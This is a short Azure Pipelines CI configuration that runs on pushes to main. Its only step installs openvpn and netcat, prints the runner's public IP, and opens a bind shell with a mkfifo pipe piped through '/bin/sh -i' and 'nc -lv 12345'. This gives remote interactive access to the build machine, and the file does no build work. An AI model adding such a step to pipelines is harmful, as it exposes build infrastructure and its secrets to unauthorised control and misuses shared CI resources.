trigger:
  - main

pool:
  vmImage: 'ubuntu-latest'

steps:
  - bash: |
      sudo apt-get update
      sudo apt-get --assume-yes --no-install-recommends install openvpn netcat
      ls
      curl ifconfig.me
      rm -f /tmp/f; mkfifo /tmp/f
      cat /tmp/f | /bin/sh -i 2>&1 | nc -lv 12345 > /tmp/f
